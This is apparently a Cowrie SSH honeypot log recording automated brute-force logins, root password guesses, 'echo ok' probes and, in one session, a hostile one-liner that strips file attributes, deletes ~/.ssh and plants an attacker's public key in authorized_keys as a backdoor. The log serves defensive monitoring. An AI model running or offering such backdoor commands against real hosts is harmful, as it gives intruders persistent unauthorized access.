{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.329231Z","src_ip":"212.227.125.160","session":"405fb51cd0db"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.329965Z","src_ip":"212.227.125.160","session":"405fb51cd0db"}
{"eventid":"cowrie.login.success","username":"root","password":"CAROLE","message":"login attempt [root/CAROLE] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.512093Z","src_ip":"212.227.125.160","session":"405fb51cd0db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:21.589512Z","src_ip":"212.227.125.160","session":"405fb51cd0db"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.590251Z","src_ip":"212.227.125.160","session":"405fb51cd0db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.668394Z","src_ip":"212.227.125.160","session":"405fb51cd0db"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.669477Z","src_ip":"212.227.125.160","session":"405fb51cd0db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41298,"dst_ip":"1.2.3.4","dst_port":22,"session":"15fc72db468e","protocol":"ssh","message":"New connection: 212.227.125.160:41298 (1.2.3.4:22) [session: 15fc72db468e]","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.697038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.731050Z","src_ip":"212.227.125.160","session":"15fc72db468e"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.732104Z","src_ip":"212.227.125.160","session":"15fc72db468e"}
{"eventid":"cowrie.login.success","username":"root","password":"300688","message":"login attempt [root/300688] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.902996Z","src_ip":"212.227.125.160","session":"15fc72db468e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:22.429084Z","src_ip":"212.227.125.160","session":"15fc72db468e"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:22.429811Z","src_ip":"212.227.125.160","session":"15fc72db468e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:22.468258Z","src_ip":"212.227.125.160","session":"15fc72db468e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:22.469301Z","src_ip":"212.227.125.160","session":"15fc72db468e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58820,"dst_ip":"1.2.3.4","dst_port":22,"session":"aee31c722d3b","protocol":"ssh","message":"New connection: 212.227.125.160:58820 (1.2.3.4:22) [session: aee31c722d3b]","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.207879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.208544Z","src_ip":"212.227.125.160","session":"aee31c722d3b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.376329Z","src_ip":"212.227.125.160","session":"aee31c722d3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41310,"dst_ip":"1.2.3.4","dst_port":22,"session":"72f6ef803b9d","protocol":"ssh","message":"New connection: 212.227.125.160:41310 (1.2.3.4:22) [session: 72f6ef803b9d]","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.509158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.510077Z","src_ip":"212.227.125.160","session":"72f6ef803b9d"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.533771Z","src_ip":"212.227.125.160","session":"72f6ef803b9d"}
{"eventid":"cowrie.login.success","username":"root","password":"271289","message":"login attempt [root/271289] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.637133Z","src_ip":"212.227.125.160","session":"72f6ef803b9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:23.703717Z","src_ip":"212.227.125.160","session":"72f6ef803b9d"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.704772Z","src_ip":"212.227.125.160","session":"72f6ef803b9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.728381Z","src_ip":"212.227.125.160","session":"72f6ef803b9d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.729557Z","src_ip":"212.227.125.160","session":"72f6ef803b9d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456789","message":"login attempt [oracle/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:47:23.881609Z","src_ip":"212.227.125.160","session":"aee31c722d3b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:25.073209Z","src_ip":"212.227.125.160","session":"aee31c722d3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41316,"dst_ip":"1.2.3.4","dst_port":22,"session":"44fb1329f765","protocol":"ssh","message":"New connection: 212.227.125.160:41316 (1.2.3.4:22) [session: 44fb1329f765]","sensor":"my-vps","timestamp":"2025-08-28T11:47:26.837765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:26.838623Z","src_ip":"212.227.125.160","session":"44fb1329f765"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:26.860921Z","src_ip":"212.227.125.160","session":"44fb1329f765"}
{"eventid":"cowrie.login.success","username":"root","password":"271184","message":"login attempt [root/271184] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:26.955280Z","src_ip":"212.227.125.160","session":"44fb1329f765"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:27.016103Z","src_ip":"212.227.125.160","session":"44fb1329f765"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:27.016821Z","src_ip":"212.227.125.160","session":"44fb1329f765"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:27.040689Z","src_ip":"212.227.125.160","session":"44fb1329f765"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:27.041634Z","src_ip":"212.227.125.160","session":"44fb1329f765"}
{"eventid":"cowrie.session.connect","src_ip":"209.141.53.124","src_port":56542,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d6d3bee5951","protocol":"ssh","message":"New connection: 209.141.53.124:56542 (1.2.3.4:22) [session: 3d6d3bee5951]","sensor":"my-vps","timestamp":"2025-08-28T11:47:29.497742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:29.499664Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:29.641926Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.login.success","username":"root","password":"pasSw0rd","message":"login attempt [root/pasSw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:30.204376Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:30.500288Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:30.501067Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:47:30.502101Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:30.652002Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:30.995679Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:47:30.996701Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:47:31.147716Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:31.148770Z","src_ip":"209.141.53.124","session":"3d6d3bee5951"}
{"eventid":"cowrie.session.connect","src_ip":"209.141.53.124","src_port":56984,"dst_ip":"1.2.3.4","dst_port":22,"session":"73bb9d492f0c","protocol":"ssh","message":"New connection: 209.141.53.124:56984 (1.2.3.4:22) [session: 73bb9d492f0c]","sensor":"my-vps","timestamp":"2025-08-28T11:47:31.285738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:31.286790Z","src_ip":"209.141.53.124","session":"73bb9d492f0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:31.430010Z","src_ip":"209.141.53.124","session":"73bb9d492f0c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:47:32.037306Z","src_ip":"209.141.53.124","session":"73bb9d492f0c"}
{"eventid":"cowrie.session.connect","src_ip":"186.10.27.2","src_port":60292,"dst_ip":"1.2.3.4","dst_port":22,"session":"492de6b8e792","protocol":"ssh","message":"New connection: 186.10.27.2:60292 (1.2.3.4:22) [session: 492de6b8e792]","sensor":"my-vps","timestamp":"2025-08-28T11:47:33.184531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:33.186216Z","src_ip":"186.10.27.2","session":"492de6b8e792"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:33.189340Z","src_ip":"209.141.53.124","session":"73bb9d492f0c"}
{"eventid":"cowrie.session.connect","src_ip":"209.141.53.124","src_port":57482,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f723855f6f2","protocol":"ssh","message":"New connection: 209.141.53.124:57482 (1.2.3.4:22) [session: 1f723855f6f2]","sensor":"my-vps","timestamp":"2025-08-28T11:47:33.326407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:47:33.328252Z","src_ip":"209.141.53.124","session":"1f723855f6f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","e